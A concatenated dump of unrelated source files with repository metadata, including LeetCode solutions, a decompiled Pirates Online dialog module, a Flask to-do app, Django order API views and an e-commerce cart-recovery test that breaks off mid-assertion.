2a7f70925be3844266a29d8d9c3d9824794a0c0f | dfab6798ece135946aebb08f93f162c37dd51791 | /core/luban/controller/Actor.py | 8452c92ace1f56996ae2ccc29b60f307a6a30f4f | [] | no_license | yxqd/luban | 405f5f7dcf09015d214079fe7e23d644332be069 | 00f699d15c572c8bf160516d582fa37f84ac2023 | refs/heads/master | 2020-03-20T23:08:45.153471 | 2012-05-18T14:52:43 | 2012-05-18T14:52:43 | 137,831,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class Actor(object):
# properties
name = None # name of the actor
controller = None # the controller
# exceptions
from .exceptions import RoutineNotFound
# methods
def perform(self, routine=None, *args, **kwds):
if routine is None:
routine = "default"
if routine.startswith('_'):
raise RuntimeError("%s is private" % routine)
try:
behavior = getattr(self, routine)
except AttributeError:
msg = "actor %r: routine %r is not yet implemented" % (
self.name, routine)
raise self.RoutineNotFound(msg)
# special name "kwds"
if 'kwds' in kwds:
kwds2 = kwds['kwds']
if isinstance(kwds2, strbase):
from ..weaver.web._utils import jsonDecode
kwds2 = jsonDecode(kwds2)
for k in kwds2:
if k in kwds:
raise RuntimeError("conflict key: %s" % k)
continue
kwds.update(kwds2)
del kwds['kwds']
return behavior(*args, **kwds)
pass # end of Actor
from luban import py_major_ver
if py_major_ver == 2:
strbase = basestring
elif py_major_ver == 3:
strbase = str
# End of file
| [
"[email protected]"
] | |
5bcff8ae4c42c2bafb1c80881769ed67f44ea8e9 | f2889a13368b59d8b82f7def1a31a6277b6518b7 | /256.py | d94465af0b09e0a288eb3073779e9c08ea3bc589 | [] | no_license | htl1126/leetcode | dacde03de5c9c967e527c4c3b29a4547154e11b3 | c33559dc5e0bf6879bb3462ab65a9446a66d19f6 | refs/heads/master | 2023-09-01T14:57:57.302544 | 2023-08-25T15:50:56 | 2023-08-25T15:50:56 | 29,514,867 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | # ref: https://discuss.leetcode.com/topic/21337/1-lines-ruby-python
class Solution(object):
def minCost(self, costs):
"""
:type costs: List[List[int]]
:rtype: int
"""
prev = [0] * 3
for now in costs:
prev = [now[i] + min(prev[:i] + prev[i + 1:]) for i in xrange(3)]
return min(prev)
if __name__ == '__main__':
sol = Solution()
print sol.minCost([[1, 2, 3], [3, 2, 1]])
| [
"[email protected]"
] | |
0df69e3db7af12577fa662d3a36c94d62a749ea6 | 303bac96502e5b1666c05afd6c2e85cf33f19d8c | /solutions/python3/257.py | de9a0c8a3c1cbc818b3466259db95a34a7020459 | [
"MIT"
] | permissive | jxhangithub/leetcode | 5e82f4aeee1bf201e93e889e5c4ded2fcda90437 | 0de1af607557d95856f0e4c2a12a56c8c57d731d | refs/heads/master | 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 | MIT | 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null | UTF-8 | Python | false | false | 678 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def binaryTreePaths(self, root: TreeNode) -> List[str]:
def dfs(node, arr):
if not node.right and not node.left:
#print(arr)
self.res += ['->'.join(str(num) for num in arr)]
if node.left:
dfs(node.left, arr + [node.left.val])
if node.right:
dfs(node.right, arr + [node.right.val])
self.res = []
if not root: return []
dfs(root, [root.val])
return self.res | [
"[email protected]"
] | |
3fbb4786ff15759eb93e82bc5ad3d7e00e55e2b8 | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /Sourcem8/pirates/quest/DialogProcess.py | dd929c9b374131c5d5005f5d444192c13516197e | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17,677 | py | from direct.showbase.PythonUtil import makeTuple
from pirates.piratesbase.PythonUtil import POD
from direct.showbase.DirectObject import DirectObject
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui import GuiButton
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.quest import QuestOffer
from pirates.quest.QuestPrereq import *
from pirates.effects import CombatEffect
from pirates.audio import SoundGlobals
from pirates.audio.SoundGlobals import loadSfx
class DialogProcess(POD, DirectObject):
DataSet = {
'prereq': [],
'dialogId': None,
'delayCleanup': False }
def avCanParticipate(self, av):
for prereq in self.prereq:
if not prereq.avIsReady(av):
return False
continue
return True
def avCanParticipateAI(self, av):
for prereq in self.prereq:
if not prereq.avIsReadyAI(av):
return False
continue
return True
def handleEscapeKey(self):
pass
def begin(self, npc, dialogId):
self.accept('escape', self.handleEscapeKey)
self.dialogId = dialogId
self.npc = npc
def end(self):
self.ignore('escape')
messenger.send('DialogProcessEnded')
def cleanup(self):
pass
class Prereq(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.end()
class NPCDialog(DialogProcess):
DataSet = {
'textId': None }
def _NPCDialog__getDialogText(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('dialog')
def _NPCDialog__getDialogEmotes(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('emotes')
def _NPCDialog__handleNextChatPage(self, pageNumber, elapsed):
if pageNumber == base.localAvatar.guiMgr.dialogSubtitler.getNumChatPages() - 1:
localAvatar.guiMgr.dialogSubtitler.confirmButton.hide()
self.ignore('nextChatPage')
self.end()
else:
self._NPCDialog__playAnimation(pageNumber)
def _NPCDialog__playAnimation(self, index):
if self.animationIval:
self.animationIval.finish()
self.animationIval = None
if self.dialogAnimSet:
if len(self.dialogAnimSet) > index and self.dialogAnimSet[index]:
self.npc.gameFSM.request('Emote')
self.npc.playEmote(self.dialogAnimSet[index])
def cleanup(self):
self.ignore('nextChatPage')
self.ignore('doneChatPage')
if self.dialogBox:
self.dialogBox.remove_node()
if self.nametagLabel:
self.nametagLabel.destroy()
def handleEscapeKey(self):
localAvatar.guiMgr.dialogSubtitler.advancePageNumber()
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.animationIval = None
self.dialogAnimSet = []
self.defaultAnim = None
self.dialogBox = loader.loadModel('models/gui/pir_m_gui_frm_questChat')
self.dialogBox.reparentTo(aspect2d)
self.dialogBox.setScale(25.5)
self.dialogBox.setPos(-0.48, 0, -0.58)
self.dialogBox.find('**/pointer_left').hide()
self.dialogBox.find('**/pointer_none').hide()
self.dialogBox.setBin('gui-fixed', 0)
self.nametagLabel = DirectLabel(parent = aspect2d, relief = None, text = self.npc.getName(), text_font = PiratesGlobals.getPirateFont(), text_shadow = PiratesGuiGlobals.TextShadow, text_align = TextNode.ARight, text_fg = PiratesGuiGlobals.TextFG8, text_scale = 0.055, pos = (0.3, 0, -0.44))
self.nametagLabel.setBin('gui-fixed', 1)
dialogStr = self._NPCDialog__getDialogText()
self.dialogAnimSet = self._NPCDialog__getDialogEmotes()
localAvatar.guiMgr.dialogSubtitler.setPageChat(dialogStr)
self._NPCDialog__playAnimation(0)
if localAvatar.guiMgr.dialogSubtitler.getNumChatPages() == 1:
self._NPCDialog__handleNextChatPage(0, 0)
else:
self.accept('nextChatPage', self._NPCDialog__handleNextChatPage)
self.accept('doneChatPage', self.end)
def end(self):
if self.animationIval:
self.animationIval.finish()
self.animationIval = None
DialogProcess.end(self)
class PlayerDialog(DialogProcess):
DataSet = {
'textId': 0 }
def _PlayerDialog__getDialogText(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('dialog')
def _PlayerDialog__getDialogEmotes(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('emotes')
def _PlayerDialog__handleNextChatPage(self, pageNumber, elapsed):
if pageNumber == base.localAvatar.guiMgr.dialogSubtitler.getNumChatPages() - 1:
localAvatar.guiMgr.dialogSubtitler.confirmButton.hide()
self.ignore('nextChatPage')
self.end()
else:
self._PlayerDialog__playAnimation(pageNumber)
def _PlayerDialog__playAnimation(self, index):
if self.animationIval:
self.animationIval.finish()
self.animationIval = None
if self.dialogAnimSet:
if not self.defaultAnim:
self.defaultAnim = self.npc.getCurrentAnim()
if len(self.dialogAnimSet) > index and self.dialogAnimSet[index]:
localAvatar.playEmote(self.dialogAnimSet[index])
def cleanup(self):
self.ignore('nextChatPage')
self.ignore('doneChatPage')
localAvatar.guiMgr.dialogSubtitler.clearText()
if self.dialogBox:
self.dialogBox.remove_node()
if self.nametagLabel:
self.nametagLabel.destroy()
def handleEscapeKey(self):
localAvatar.guiMgr.dialogSubtitler.advancePageNumber()
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.animationIval = None
self.dialogAnimSet = []
self.defaultAnim = None
self.dialogBox = loader.loadModel('models/gui/pir_m_gui_frm_questChat')
self.dialogBox.reparentTo(aspect2d)
self.dialogBox.setScale(25.5)
self.dialogBox.setPos(-0.48, 0, -0.58)
self.dialogBox.find('**/pointer_right').hide()
self.dialogBox.find('**/pointer_none').hide()
self.dialogBox.setBin('gui-fixed', 0)
self.nametagLabel = DirectLabel(parent = aspect2d, relief = None, text = localAvatar.getName(), text_font = PiratesGlobals.getPirateFont(), text_shadow = PiratesGuiGlobals.TextShadow, text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG8, text_scale = 0.055, pos = (-0.6, 0, -0.44))
self.nametagLabel.setBin('gui-fixed', 1)
dialogStr = self._PlayerDialog__getDialogText()
self.dialogAnimSet = self._PlayerDialog__getDialogEmotes()
localAvatar.guiMgr.dialogSubtitler.setPageChat(dialogStr)
self._PlayerDialog__playAnimation(0)
if localAvatar.guiMgr.dialogSubtitler.getNumChatPages() == 1:
self._PlayerDialog__handleNextChatPage(0, 0)
else:
self.accept('nextChatPage', self._PlayerDialog__handleNextChatPage)
self.accept('doneChatPage', self.end)
class StepChoice(DialogProcess):
DataSet = {
'choices': tuple() }
def _StepChoice__getDialogChoiceText(self, stepId, index = 0):
DialogDict = DialogDict
import pirates.quest.DialogTree
textId = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(stepId)[index].getTextId()
if 'choice' in PLocalizer.DialogStringDict.get(self.dialogId).get(textId):
return PLocalizer.DialogStringDict.get(self.dialogId).get(textId).get('choice')
else:
return PLocalizer.DialogStringDict.get(self.dialogId).get(textId).get('dialog')
def highlightIcon(self, buttonIndex, event):
self.choiceButtons[buttonIndex]['image_color'] = PiratesGuiGlobals.TextFG8
def unhighlightIcon(self, buttonIndex, event):
self.choiceButtons[buttonIndex]['image_color'] = PiratesGuiGlobals.TextFG2
def buttonClicked(self, stepId):
messenger.send('SwitchStep', [
stepId])
def handleEscapeKey(self):
pass
def displayStepChoices(self):
DialogDict = DialogDict
import pirates.quest.DialogTree
self.choiceLabels = []
self.choiceButtons = []
gui = loader.loadModel('models/gui/compass_main')
choiceIcon = gui.find('**/icon_sphere')
for i in xrange(len(self.choices)):
index = 0
process = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(self.choices[i])[index]
while not isinstance(process, PlayerDialog):
index += 1
process = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(self.choices[i])[index]
while not process.avCanParticipate(localAvatar):
index += 1
process = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(self.choices[i])[index]
if process.avCanParticipate(localAvatar) and isinstance(process, PlayerDialog):
choiceButton = GuiButton.GuiButton(parent = aspect2d, relief = None, text = self._StepChoice__getDialogChoiceText(self.choices[i], index), text_font = PiratesGlobals.getPirateFont(), text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = None, text_align = TextNode.ALeft, text_scale = 0.055, text0_fg = PiratesGuiGlobals.TextFG2, text1_fg = PiratesGuiGlobals.TextFG8, text2_fg = PiratesGuiGlobals.TextFG8, text3_fg = PiratesGuiGlobals.TextFG9, image = choiceIcon, image_scale = 0.29999999999999999, image_pos = (-0.050000000000000003, 0, 0.0070000000000000001), geom = None, pos = (-1.1499999999999999, 0, -0.47999999999999998 - i * 0.074999999999999997), command = self.buttonClicked, extraArgs = [
self.choices[i]])
choiceButton.setBin('gui-fixed', 1)
choiceButton.bind(DGG.ENTER, self.highlightIcon, extraArgs = [
i])
choiceButton.bind(DGG.EXIT, self.unhighlightIcon, extraArgs = [
i])
self.choiceButtons.append(choiceButton)
continue
def cleanUpStepChoices(self):
for button in self.choiceButtons:
button.destroy()
self.choiceButtons = []
def cleanup(self):
self.cleanUpStepChoices()
if self.dialogBox:
self.dialogBox.remove_node()
self.dialogBox = None
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.dialogBox = loader.loadModel('models/gui/pir_m_gui_frm_questChat')
self.dialogBox.reparentTo(aspect2d)
self.dialogBox.setScale(25.5)
self.dialogBox.setPos(-0.48, 0, -0.58)
self.dialogBox.find('**/pointer_left').hide()
self.dialogBox.find('**/pointer_right').hide()
self.dialogBox.setBin('gui-fixed', 0)
self.displayStepChoices()
localAvatar.guiMgr.dialogSubtitler.confirmButton.hide()
class SwitchStep(DialogProcess):
DataSet = {
'stepId': 0 }
class ExitDialog(DialogProcess):
def begin(self, npc, dialogId):
npc.requestExit()
self.end()
class OfferQuest(DialogProcess):
DataSet = {
'questId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.acceptOnce('setDialogQuestOffer', self._OfferQuest__gotQuestOffer)
npc.requestDialogQuestOffer(self.questId, dialogId)
def _OfferQuest__gotQuestOffer(self):
def handleOption(option):
if option == PLocalizer.Accept:
self.npc.assignDialogQuestOffer()
self.end()
self.npc.showDialogQuestOffer()
localAvatar.guiMgr.dialogSubtitler.setPageChat('', options = [
PLocalizer.Decline,
PLocalizer.Accept], callback = handleOption)
def handleEscapeKey(self):
pass
class AssignQuest(DialogProcess):
DataSet = {
'questId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.acceptOnce('setDialogQuestOffer', self._AssignQuest__gotQuestAssigned)
npc.requestDialogQuestAssignment(self.questId, dialogId)
def end(self):
self.npc.cleanUpQuestDetails()
DialogProcess.end(self)
def _AssignQuest__gotQuestAssigned(self):
def handleOption(option):
self.end()
self.npc.showDialogQuestOffer()
localAvatar.guiMgr.dialogSubtitler.setPageChat('', options = [
PLocalizer.Accept], callback = handleOption)
def handleEscapeKey(self):
pass
class AdvanceQuest(DialogProcess):
DataSet = {
'questId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.requestDialogQuestAdvancement(self.questId, dialogId)
self.end()
class ShowGivenQuest(DialogProcess):
def begin(self, npc, dialogId):
npc.displayNewQuests()
def handleEscapeKey(self):
pass
class ShowRewards(DialogProcess):
def begin(self, npc, dialogId):
npc.showQuestRewards()
self.end()
class HideRewards(DialogProcess):
def begin(self, npc, dialogId):
npc.hideQuestRewards()
self.end()
class MakeNPCHostile(DialogProcess):
DataSet = {
'npcId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.requestNPCHostile(self.npcId, dialogId)
self.end()
class PlayCombatEffectOnNPC(DialogProcess):
DataSet = {
'effectId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
combatEffect = CombatEffect.CombatEffect(self.effectId, attacker = localAvatar)
combatEffect.reparentTo(render)
combatEffect.setPos(npc.getPos(render) + Point3(0, 0, 2.5))
combatEffect.play()
self.end()
class FadeOutGhost(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.fadeOutGhost()
self.end()
class Delay(DialogProcess):
DataSet = {
'duration': 0 }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
taskMgr.doMethodLater(self.duration, self.endWaitTask, 'endDialogProcess')
def endWaitTask(self, task):
self.end()
def cleanup(self):
taskMgr.remove('endDialogProcess')
class SwitchVisualModeNPC(DialogProcess):
DataSet = {
'mode': None,
'skipHide': False }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.switchVisualMode(self.mode, self.skipHide)
self.end()
class PlayNPCEmote(DialogProcess):
DataSet = {
'emoteId': None,
'npcId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
if self.npcId:
npcDoId = base.cr.uidMgr.getDoId(self.npcId)
self.npc = base.cr.doId2do.get(npcDoId)
self.npc.gameFSM.request('Emote')
self.npc.playEmote(self.emoteId)
self.end()
class PlayPlayerEmote(DialogProcess):
DataSet = {
'emoteId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
localAvatar.playEmote(self.emoteId)
self.end()
class PlayerDrawPistolAndAim(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
weaponId = 2001
Pistol = Pistol
import pirates.battle
localAvatar.dialogProp = Pistol.Pistol(weaponId)
self.animIval = Sequence(localAvatar.dialogProp.getDrawIval(localAvatar), Func(localAvatar.loop, 'gun_aim_idle'), Func(self.end)).start()
def end(self):
if self.animIval:
self.animIval.pause()
self.animIval = None
DialogProcess.end(self)
def cleanup(self):
if localAvatar.dialogProp:
localAvatar.dialogProp.detachNode()
class PlayerHidePistol(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.animIval = None
if localAvatar.dialogProp:
self.animIval = Sequence(localAvatar.dialogProp.getReturnIval(localAvatar), Func(localAvatar.loop, 'idle'), Func(self.end)).start()
else:
self.end()
def end(self):
if self.animIval:
self.animIval.pause()
self.animIval = None
localAvatar.dialogProp = None
DialogProcess.end(self)
class PlayChickenFly(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.npc.play('fly', startFrame = 20)
self.end()
class PlaySfx(DialogProcess):
DataSet = {
'sfxId': None }
sfxList = {
SoundGlobals.SFX_SKILL_CLEANSE: loadSfx(SoundGlobals.SFX_SKILL_CLEANSE) }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
sfx = self.sfxList.get(self.sfxId)
base.playSfx(sfx, volume = 0.75)
self.end()
| [
"[email protected]"
] | |
d22cf8a285c59ddf0e21693168cc10d8de3a8edf | 0729155365ebd2e8761068bda78060f0c2d6e6a7 | /Class And Object Programs/3__Calculate the Area and Perimeter of Circle Using The Class.py | 412cc99095898ee61f62e70e3823075e3ba7c024 | [] | no_license | mukeshrock7897/Class-And-Object-Programs | a0ce41b19ebdd87bb037ca742069f98c59c21847 | a6cf378ab4c5a3d95a46867b5414b44955838782 | refs/heads/master | 2020-04-24T05:04:53.234277 | 2019-02-20T18:10:25 | 2019-02-20T18:10:25 | 171,724,815 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | import math
class Circle:
def __init__(self,radius):
self.radius=radius
def area(self):
return math.pi*(self.radius**2)
def perimeter(self):
return 2*math.pi*self.radius
radius=int(input("Enter The Radius Of Circle::"))
obj=Circle(radius)
print("Area Of Circle::",round(obj.area(),2))
print("Perimeter of Circle::",round(obj.perimeter(),2))
| [
"[email protected]"
] | |
e0004b0b6df60bd3030ff004ed0bbefc869e38b4 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/minimum-string-length-after-removing-substrings.py | 48bab73ecbf57ba9c36b9cfb91378585932a9056 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 381 | py | # Time: O(n)
# Space: O(n)
# stack
class Solution(object):
def minLength(self, s):
"""
:type s: str
:rtype: int
"""
stk = []
for c in s:
if stk and ((stk[-1] == 'A' and c == 'B') or (stk[-1] == 'C' and c == 'D')):
stk.pop()
continue
stk.append(c)
return len(stk)
| [
"[email protected]"
] | |
606477f67edd3313746f9af6bd76d0bcc0b0f20d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_salaams.py | 1de6f8529dce67507995a11f6402f5e970de1ab1 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _SALAAMS():
def __init__(self,):
self.name = "SALAAMS"
self.definitions = salaam
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['salaam']
| [
"[email protected]"
] | |
e0a001fca791b06a772558c84bf3d8c100a2c4dd | ba3a705ecb3628641793854292aa9a3ff8fc1221 | /10_API/FlaskIntroduction/app.py | 0a23ab3144d2a8d92dd00599475768d8da80d806 | [] | no_license | mortenhaahr/NGK | d98ada8d63a07ea6447768ab6a23ad1346634b56 | a9e89afb452dd7953cba4403b4e8bc2c0ff2ba1e | refs/heads/master | 2022-07-01T20:39:02.063251 | 2020-05-11T15:40:26 | 2020-05-11T15:40:26 | 242,725,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | from flask import Flask, render_template, url_for, request, redirect
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
app = Flask(__name__) #__name__ = filename
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db' # 3 forward slashes for relative path
db = SQLAlchemy(app) # Pass in app to database and init db
class Todo(db.Model):
id = db.Column(db.Integer, primary_key=True)
content = db.Column(db.String(200), nullable=False) #Max 200 chars and dont allow it to be blank
date_created = db.Column(db.DateTime, default=datetime.utcnow) #Never has to be set manually
# Everytime we make a new taks, it shall return the ID of that task:
def __repr__(self):
return '<Task %r' % self.id
#Must setup database manually in python ONCE, to create the db in env:
# Type following in console:
# python3 [enter] from app import db [enter] db.create_all() [enter] exit() [enter]
@app.route('/', methods=['POST', 'GET']) #root directory. POST and GET defines that the directory accepts POST and GET requests
def index():
if request.method == 'POST':
task_content = request.form['content']
new_task = Todo(content=task_content)
try:
db.session.add(new_task)
db.session.commit()
return redirect('/')
except:
return 'There was an issue adding your task'
else:
tasks = Todo.query.order_by(Todo.date_created).all() # Return all database instances in order created
#return "Hello, World!" # return basic string on website
return render_template('index.html', tasks=tasks) #return index page.
# make delete route
@app.route('/delete/<int:id>')
def delete(id):
task_to_delete = Todo.query.get_or_404(id) # Get object by id, if it fails, throw 404
try:
db.session.delete(task_to_delete)
db.session.commit()
return redirect('/')
except:
return 'There was a problem deleting that task'
@app.route('/update/<int:id>', methods=['GET', 'POST'])
def update(id):
task = Todo.query.get_or_404(id) #define our task variable for this function
if request.method == 'POST':
task.content = request.form['content']
try:
db.session.commit()
return redirect('/')
except:
return 'There was an issue updating your task'
else:
return render_template('update.html', task=task)
if __name__ == "__main__":
app.run(debug=True) | [
"[email protected]"
] | |
393267ba2fca5a36bba7334d69ab49829c14bc68 | 84d84096b413e84f502468a2985780a3005457a1 | /api/orders/views.py | 1daaf6e39ac7835363150b9c1afaa1afd0c60dcf | [
"MIT"
] | permissive | joeltio/np-train | 0fd28fe45bdc9c29aee99819ca07798392e13fd1 | dc852321b674be3ddc1d1c0dd4eff694825d02fa | refs/heads/master | 2020-04-14T18:56:57.714933 | 2019-01-10T01:58:09 | 2019-01-10T01:58:09 | 164,039,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,984 | py | import json
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from orders.models import Order
import base.helpers as base_helpers
@csrf_exempt
@require_POST
def uncompleted_order(request):
# Get the latest uncompleted order
order = Order.objects.filter(
status=Order.STATUS_NOT_ACTIVE).order_by("id").first()
if order is not None:
return base_helpers.create_json_response(
data=order.as_json()
)
else:
return base_helpers.create_json_response(
message="There are no uncompleted orders",
empty_data=True,
)
@csrf_exempt
@require_POST
def new_order(request):
# Read json
try:
json_data = json.loads(request.body)
except json.decoder.JSONDecodeError:
return base_helpers.create_json_response(
success=False,
message="Bad JSON",
status=400
)
# Check if there is a destination and color
if not base_helpers.has_keys({"destination", "color"}, json_data):
return base_helpers.create_json_response(
success=False,
message="Missing destination or color",
status=400,
)
destination = json_data["destination"]
color = json_data["color"]
if not base_helpers.validate_positive_int(color, include_zero=True):
return base_helpers.create_json_response(
success=False,
message="The color is not a non-negative integer",
status=400,
)
if not isinstance(destination, str):
return base_helpers.create_json_response(
success=False,
message="The destination must be a string",
status=400,
)
order = Order.objects.create(
destination=destination, color=color,
status=Order.STATUS_NOT_ACTIVE)
return base_helpers.create_json_response(
data={"id": order.pk}
)
@csrf_exempt
@require_POST
def update_order(request):
# Read json
try:
json_data = json.loads(request.body)
except json.decoder.JSONDecodeError:
return base_helpers.create_json_response(
success=False,
message="Bad JSON",
status=400
)
if not base_helpers.has_keys({"id", "new_status"}, json_data):
return base_helpers.create_json_response(
success=False,
message="Missing id or new_status",
status=400,
)
if not base_helpers.validate_positive_int(
json_data["id"], include_zero=True):
return base_helpers.create_json_response(
success=False,
message="Bad id",
status=400,
)
elif not json_data["new_status"] in Order.STATUS_FLOW:
return base_helpers.create_json_response(
success=False,
message="Bad new_status",
status=400,
)
new_status = json_data["new_status"]
# Find the order
try:
order = Order.objects.get(pk=int(json_data["id"]))
except Order.DoesNotExist:
return base_helpers.create_json_response(
success=False,
message="There is no order with that id",
status=400,
)
# Only allow changes in this order:
# NOT_ACTIVE > ACTIVE > COMPLETED
if order.status == Order.STATUS_FLOW[-1]:
return base_helpers.create_json_response(
success=False,
message="The order is already complete",
status=400,
)
elif new_status - order.status != 1:
return base_helpers.create_json_response(
success=False,
message="Cannot update status beyond 1 step",
status=400,
)
order.status = new_status
order.save()
return base_helpers.create_json_response()
@csrf_exempt
@require_POST
def order_status(request):
# Read json
try:
json_data = json.loads(request.body)
except json.decoder.JSONDecodeError:
return base_helpers.create_json_response(
success=False,
message="Bad JSON",
status=400
)
if "id" not in json_data:
return base_helpers.create_json_response(
success=False,
message="Missing id",
status=400,
)
if not base_helpers.validate_positive_int(
json_data["id"], include_zero=True):
return base_helpers.create_json_response(
success=False,
message="Bad id",
status=400,
)
# Get the order
try:
order = Order.objects.get(pk=json_data["id"])
except Order.DoesNotExist:
return base_helpers.create_json_response(
success=False,
message="There is no order with that id",
status=400,
)
return base_helpers.create_json_response(
data={"status": order.status}
)
| [
"[email protected]"
] | |
3dcadaa240a921e97bab29a8008a1b83bac8c93d | f3081f31875dc539529d1ef24a6ddedbb1cd5ad3 | /website_sale/tests/test_website_sale_cart_recovery.py | ac597616882ce66ce7ca4ffa447974a46ef75571 | [] | no_license | babarlhr/human_website_13 | 5ef144c65c8eb268b40c144e0073d8d2084014ed | e9d68d29959a7df3f56eadebe413556b11957ace | refs/heads/master | 2022-11-06T09:02:17.301645 | 2020-06-21T10:32:16 | 2020-06-21T10:32:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,475 | py | # -*- coding: utf-8 -*-
# Part of Eagle. See LICENSE file for full copyright and licensing details.
from eagle.tests import tagged
from eagle.tests.common import HttpCase, TransactionCase
@tagged('post_install', '-at_install')
class TestWebsiteSaleCartRecovery(HttpCase):
def test_01_info_cart_recovery_tour(self):
"""The goal of this test is to make sure cart recovery works."""
self.start_tour("/", 'info_cart_recovery', login="portal")
@tagged('post_install', '-at_install')
class TestWebsiteSaleCartRecoveryServer(TransactionCase):
def setUp(self):
res = super(TestWebsiteSaleCartRecoveryServer, self).setUp()
self.customer = self.env['res.partner'].create({
'name': 'a',
'email': '[email protected]',
})
self.recovery_template_default = self.env.ref('website_sale.mail_template_sale_cart_recovery')
self.recovery_template_custom1 = self.recovery_template_default.copy()
self.recovery_template_custom2 = self.recovery_template_default.copy()
self.website0 = self.env['website'].create({
'name': 'web0',
'cart_recovery_mail_template_id': self.recovery_template_default.id,
})
self.website1 = self.env['website'].create({
'name': 'web1',
'cart_recovery_mail_template_id': self.recovery_template_custom1.id,
})
self.website2 = self.env['website'].create({
'name': 'web2',
'cart_recovery_mail_template_id': self.recovery_template_custom2.id,
})
self.so0 = self.env['sale.order'].create({
'partner_id': self.customer.id,
'website_id': self.website0.id,
'is_abandoned_cart': True,
'cart_recovery_email_sent': False,
})
self.so1 = self.env['sale.order'].create({
'partner_id': self.customer.id,
'website_id': self.website1.id,
'is_abandoned_cart': True,
'cart_recovery_email_sent': False,
})
self.so2 = self.env['sale.order'].create({
'partner_id': self.customer.id,
'website_id': self.website2.id,
'is_abandoned_cart': True,
'cart_recovery_email_sent': False,
})
return res
def test_cart_recovery_mail_template(self):
"""Make sure that we get the correct cart recovery templates to send."""
self.assertEqual(
self.so1._get_cart_recovery_template(),
self.recovery_template_custom1,
"We do not return the correct mail template"
)
self.assertEqual(
self.so2._get_cart_recovery_template(),
